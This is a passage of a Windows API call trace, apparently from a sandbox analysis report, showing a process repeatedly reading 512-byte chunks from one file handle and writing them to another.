lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.402] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.402] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.403] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.403] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.404] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.404] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.405] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.405] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.406] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.406] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.407] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.407] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.408] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.408] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.409] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.409] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.410] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.410] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.411] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.411] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.412] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.412] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.413] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.413] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.423] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.424] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.424] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.425] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.425] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.426] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.426] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.427] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.427] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.428] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.428] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.429] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.429] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.430] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.430] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.431] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.431] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.432] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.432] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.432] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.433] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.433] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.434] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.434] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.435] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.435] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.436] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.436] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.437] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1fb, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.437] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.438] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.438] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.439] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.439] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.440] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.440] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.441] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.441] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.442] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.442] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.443] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.443] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.443] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.444] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.444] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.445] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.446] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.446] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.447] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.447] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.448] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.448] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.449] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.449] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.450] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.450] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.451] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.451] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.452] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.452] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.453] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.454] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.455] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.455] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.456] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.456] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.457] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.457] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.458] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.458] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.459] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.459] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.460] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.460] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.461] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.461] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 